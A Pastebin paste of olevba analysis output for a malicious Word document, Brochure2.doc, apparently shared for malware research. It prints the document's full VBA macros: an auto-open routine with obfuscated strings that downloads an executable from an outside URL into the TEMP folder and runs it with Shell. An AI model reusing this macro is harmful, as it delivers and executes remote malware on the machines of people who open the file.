Advertisement
dynamoo

Malicious Word macro

Mar 5th, 2015
737
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- Brochure2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Brochure2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: Brochure2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. eE5Ueh5
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Private Function PvEED()
  31.  
  32. End Function
  33. Public Function tYlkADG()
  34.  
  35. End Function
  36. Private Sub fOxzTwB()
  37.  
  38. End Sub
  39. Private Function HvhIfeFnE()
  40.  
  41. End Function
  42. Private Function uGASPmHgZUgxMi()
  43.  
  44. End Function
  45. Public Sub xbdIdjqgLUV()
  46.  
  47. End Sub
  48. Public Function CJoBAQTQO()
  49.  
  50. End Function
  51. Private Sub gNPkMRfcK()
  52.  
  53. End Sub
  54. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  55. ANALYSIS:
  56. No suspicious keyword or IOC found.
  57. -------------------------------------------------------------------------------
  58. VBA MACRO ÀÀâûàûâà.bas
  59. in file: Brochure2.doc - OLE stream: u'Macros/VBA/\u0410\u0410\u0432\u044b\u0430\u044b\u0432\u0430'
  60. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  61. #If VBA7 Then
  62.     Private Declare PtrSafe Function dfsdfsdfsdf Lib "urlmon" Alias _
  63.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  64.     ByVal sdfsdFFdsf As String, _
  65.     ByVal sdfsdFFdsff As String, _
  66.     ByVal sdfsdFFdsffd As Long, _
  67.     ByVal sdfsdFFdsffds As LongPtr) As LongPtr
  68. #Else
  69.     Private Declare Function dfsdfsdfsdf Lib "urlmon" Alias _
  70.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  71.     ByVal sdfsdFFdsf As String, _
  72.     ByVal sdfsdFFdsff As String, _
  73.     ByVal sdfsdFFdsffd As Long, _
  74.     ByVal sdfsdFFdsffds As Long) As Long
  75. #End If
  76.  
  77. Function E1MwLaU707(BcbMtG1 As String, o04C As String) As Boolean
  78. vJHKBJdfkgfg = dfsdfsdfsdf(0&, BcbMtG1, o04C, 0&, 0&)
  79. fTb_A = Shell(o04C, 1)
  80. End Function
  81.  
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. ANALYSIS:
  84. +------------+--------------------+-----------------------------------------+
  85. | Type       | Keyword            | Description                             |
  86. +------------+--------------------+-----------------------------------------+
  87. | Suspicious | Lib                | May run code from a DLL                 |
  88. | Suspicious | Shell              | May run an executable file or a system  |
  89. |            |                    | command                                 |
  90. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  91. +------------+--------------------+-----------------------------------------+
  92. -------------------------------------------------------------------------------
  93. VBA MACRO Class2.cls
  94. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class2'
  95. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  96.  
  97. Private Sub xMiUfC()
  98.  
  99. End Sub
  100. Private Sub Idjqg()
  101.  
  102. End Sub
  103. Public Sub TZwCJoBAQTQOoCv()
  104.  
  105. End Sub
  106. Public Sub kMRfcKYxxZhuV()
  107.  
  108. End Sub
  109. Public Function KlLQQjRpY()
  110.  
  111. End Function
  112. Private Sub wNdkmvS()
  113.  
  114. End Sub
  115. Public Sub agzHwcYYQ()
  116.  
  117. End Sub
  118. Public Sub arRQhQaRqTyweS()
  119.  
  120. End Sub
  121. Private Sub isbbNNpyKmGlJc()
  122.  
  123. End Sub
  124. Private Sub SliFpzFBNefACLj()
  125.  
  126. End Sub
  127. Private Function qwPYMsoonsdV()
  128.  
  129. End Function
  130. Private Sub TknqiGOyujDuk()
  131.  
  132. End Sub
  133. Private Sub reQsObpQ()
  134.  
  135. End Sub
  136. Private Function EspjBy()
  137.  
  138. End Function
  139. Private Function VRehvQScmhKasM()
  140.  
  141. End Function
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. ANALYSIS:
  144. No suspicious keyword or IOC found.
  145. -------------------------------------------------------------------------------
  146. VBA MACRO Module2.bas
  147. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module2'
  148. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  149.  
  150. Public Function VQuwdjCKzfbbafP(nqtlJnRBxmGxoBL As String) As String
  151. For uiTvResardhH = 1 To Len(nqtlJnRBxmGxoBL) Step 2
  152. VQuwdjCKzfbbafP = VQuwdjCKzfbbafP & Mid(nqtlJnRBxmGxoBL, uiTvResardhH, 1)
  153. Next
  154. End Function
  155. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  156. ANALYSIS:
  157. No suspicious keyword or IOC found.
  158. -------------------------------------------------------------------------------
  159. VBA MACRO Module3.bas
  160. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module3'
  161. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  162. (empty macro)
  163. -------------------------------------------------------------------------------
  164. VBA MACRO Module4.bas
  165. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module4'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167. Public Sub YjplwNdk()
  168.  
  169. End Sub
  170. Public Function NrtagzHwcYYQbM()
  171.  
  172. End Function
  173. Private Sub RQhQaRqT()
  174.  
  175. End Sub
  176. Public Function SndTi()
  177.  
  178. End Function
  179. Private Sub NNpyK()
  180.  
  181. End Sub
  182. Private Sub JcncZSl()
  183.  
  184. End Sub
  185. Public Function zFBNefAC()
  186.  
  187. End Function
  188. Private Function tJqwPYMsoonsdV()
  189.  
  190. End Function
  191. Private Sub TknqiG()
  192.  
  193. End Sub
  194. Public Sub ujDukyIrre()
  195.  
  196. End Sub
  197. Private Function bpQoaeEspjByV()
  198.  
  199. End Function
  200. Private Function RehvQScmhKasMga()
  201.  
  202. End Function
  203. Private Function EDItmtYlkAD()
  204.  
  205. End Function
  206. Private Function mfOxzTwBOZuHvhI()
  207.  
  208. End Function
  209. Sub eE5Ueh5()
  210. E1MwLaU707 VQuwdjCKzfbbafP("ht@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
  211. End Sub
  212. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  213. ANALYSIS:
  214. +------------+---------+---------------------------------------+
  215. | Type       | Keyword | Description                           |
  216. +------------+---------+---------------------------------------+
  217. | Suspicious | Environ | May read system environment variables |
  218. +------------+---------+---------------------------------------+
  219. -------------------------------------------------------------------------------
  220. VBA MACRO UserForm1.frm
  221. in file: Brochure2.doc - OLE stream: u'Macros/VBA/UserForm1'
  222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  223. (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement